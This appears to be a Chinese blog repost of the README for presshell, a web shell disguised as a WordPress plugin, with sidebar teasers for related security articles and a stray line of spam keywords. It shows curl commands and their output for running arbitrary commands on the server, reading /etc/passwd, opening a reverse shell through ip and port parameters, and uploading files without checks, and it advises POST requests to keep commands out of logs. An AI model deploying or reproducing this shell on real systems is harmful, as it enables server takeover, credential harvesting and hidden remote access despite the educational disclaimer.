<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    神兵利器 - presshell

    一顆小胡椒2022-07-27 17:42:09

    安裝

    要安裝 shell,我們假設您擁有 Wordpress 的管理權限并且可以安裝插件,因為將 PHP 文件傳輸到媒體庫無論如何都不應該工作。否則,你有一個更大的問題。

    只需將位于 Releases 部分的 zip 文件作為新擴展上傳,您就可以開始使用了。

    用法

    使用 shell 很簡單。只需將 sh命令作為參數傳遞給 shell:

    curl ' http://host/.../shell.php?cmd=uname+-a ' 
    Linux wordpress-server 2.6.32-21-generic-pae # 32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux
    

    您也可以在 POST 請求中傳遞這些參數,這是將命令排除在日志之外的推薦方法。

    curl ' http://host/.../shell.php ' --data-urlencode ' cmd=ls ' 
    LICENSE 
    README.md 
    shell.php
    

    還支持更復雜的命令,但請注意您的引用。

    curl ' http://host/.../shell.php ' --data-urlencode ' cmd=cat /etc/passwd | grep -v "\(false\|nologin\)" ' 
    root:x:0:0:root:/root:/bin/bash 
    sync:x:4:65534:sync:/bin:/bin/sync
    curl ' http://host/.../shell.php ' --data-urlencode ' cmd=python -c "from urllib.parse import urlencode; print(urlencode({\"cmd\": \"uname -a\"}))" ' 
    cmd=uname+-a
    

    您還可以使用ipport參數打開反向 shell。默認端口是443.

    curl ' http://host/.../shell.php ' --data-urlencode ' ip=127.0.0.1 '
    curl ' http://host/.../shell.php ' --data-urlencode ' ip=127.0.0.1 ' --data-urlencode ' port=1337 '
    

    為了方便,還提供了一個選項,可以無條件地將文件上傳到插件的目錄,而無需檢查。

    curl 'http://host/.../shell.php' -F 'file=@some_file'
    curl 'http://host/.../shell.php' --data-urlencode 'cmd=ls'
    LICENSE
    README.md
    shell.php
    some_file
    

    對公共或私人服務器進行未經授權的攻擊是非法的。此存儲庫的內容僅用于教育目的,如果不正確使用所提供的材料,作者將不承擔任何責任。

    shellcurl
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    神兵利器 - presshell
    2022-07-27 17:42:09
    您還可以使用ip和port參數打開反向 shell。為了方便,還提供了一個選項,可以無條件地將文件上傳到插件的目錄,而無需檢查。對公共或私人服務器進行未經授權的攻擊是非法的。
    EasyJaba 這個題目是隴原戰”疫”2021網絡安全大賽的一道題,最近正好在學習java反序列化和內存馬的相關知識,通過這個題目可以很好的進行實踐。 反序列化
    洞態 IAST 首發 Python-agent 嘗鮮,驗證 Agent 針對路徑穿越漏洞的檢測能力,啟動本地python靶場,安裝dongtai-iast Python探針,做漏洞檢測。
    常見組件未授權或配置不當情況下如何攻擊利用
    對于任何 Linux 發行版來說,最理想的安裝方法是二進制方法。我們將使用 curl 工具獲取最新版本,下載然后解壓縮文件以獲得 Nushell 二進制文件。安裝開發人員工具Ubuntu / Debian:sudo?基于 RHEL 的系統:sudo yum install libxcb openssl-devel libX11-devel -y. Nushell將在啟動時在您的 PATH中查找插件。雖然Nushell在沒有它們的情況下會有一些功能,但要獲得完整的功能,你需要將它們復制到您的路徑中,以便加載它們。從二進制文件手動安裝在 macOS 系統上運行以下命令來下載 Nushell 的最新版本:cd?切換到創建的用戶帳戶:$?
    反彈shell命令速查
    2022-07-28 06:13:42
    反彈shell命令速查
    對于任何 Linux 發行版來說,最理想的安裝方法是二進制方法。我們將使用 curl 工具獲取最新版本,下載然后解壓縮文件以獲得 Nushell 二進制文件。第 1 步:安裝開發人員工具Ubuntu / Debian:sudo?基于 RHEL 的系統:sudo?Nushell將在啟動時在您的 PATH中查找插件。
    本周二,命令行工具curl曝出兩個漏洞(CVE-2023-38545、CVE-2023-38546),其中一個是高嚴重性漏洞。漏洞詳細信息將于10月11日星期三發布curl v8.4.0修復版本后公布。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类